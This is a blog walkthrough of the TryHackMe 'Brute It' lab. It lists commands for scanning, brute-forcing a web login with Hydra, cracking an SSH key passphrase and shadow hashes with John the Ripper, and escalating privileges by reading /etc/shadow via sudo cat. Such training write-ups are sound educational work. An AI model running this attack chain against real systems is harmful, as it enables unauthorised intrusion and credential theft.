TryHackMe: Brute It Walkthrough

Sakshi Aggarwal
4 min readNov 7, 2020

--

TryHackMe | Brute It

TryHackMe is an online platform for learning and teaching cyber security, all through your browser.

tryhackme.com

Task [1]: About this box

Task [2]: Reconnaissance

To gather information about ports perform nmap scan. I used the command: nmap -sSV -Pn MACHINE_IP

To perform directory search the tool called gobuster is used. I used he command: gobuster dir -u http://MACHINE_IP --wordlist /usr/share/wordlists/dirb/common.txt

Task [3]: Getting a shell

Start with admin page. It is a simple login page.

Looking at the page source we got a comment line which is for user John that the username is admin.

We can use the famous password crack tool ‘Hydra’ to get the password with username admin. Command used: hydra -l admin -P rockyou.txt MACHINE_IP http-post-form “/admin/index.php:user=^USER^&pass=^PASS^:F=Username or password invalid” -V

After few attempts we got the password which is the answer to question 1.

After successfully logging in we got a RSA key and answer to the question 4.

The following screenshot shows the RSA key:

Using command: wget http://MACHINE_IP/admin/panel/id_rsa we can get the RSA key in our local system.

ssh2john.py is used to convert the RSA key into text format. The command used is: /usr/share/john/ssh2john.py > idrsa.txt

Using the tool john the ripper we can perform brute force to crack the RSA key using the wordlist rockyou.txt

Command used: john idrsa.txt --wordlist=rockyou.txt this will give the RSA private key passphrase.

While information gathering we got to know that port 22 is open and ssh service is running. Using the RSA key and the passphrase we can try connecting to the ssh server.

Command used: ssh john@MACHINE_IP -i id_rsa

We got a shell on SSH as user name John. Take the user flag.

Task [4]: Privilege Escalation

Using sudo -l we can check user privileges. We found that user john can run command /bin/cat as root.

Checking on GTFObins that if we can exploit /bin/cat or not. Yes /bin/cat can be exploited.

Following the steps given in GTFObins we can get access to the /etc/shadow which contains the system users and passwords.

Make a file named ‘hashes’ and copy the content of shadow file in hashes and using john to crack the hashes using rockyou.txt, we got the password of root.

Command used: john hashes --wordlist=rockyou.txt

Using su command to change the user to root. And yesssss….. We are root user now. Get the root flag.

Successfully completed the room :-)

Thank you!!!

Cybersecurity
Tryhackme Walkthrough
Linux
Nmap
Privilege Escalation

--

--

Sakshi Aggarwal

Written by Sakshi Aggarwal

70 Followers

Digital forensics enthusiast | Cyber security | Bug hunter | Java | Python | Analyzer

More from Sakshi Aggarwal

See all from Sakshi Aggarwal

Recommended from Medium

Lists

General Coding Knowledge

20 stories362 saves
A search field with results below. In the background are book covers.

Now in AI: Handpicked by Better Programming

266 stories154 saves

Staff Picks

454 stories296 saves
See more recommendations

Help

Status

Writers

Blog

Careers

Privacy

Terms

About

Text to speech

Teams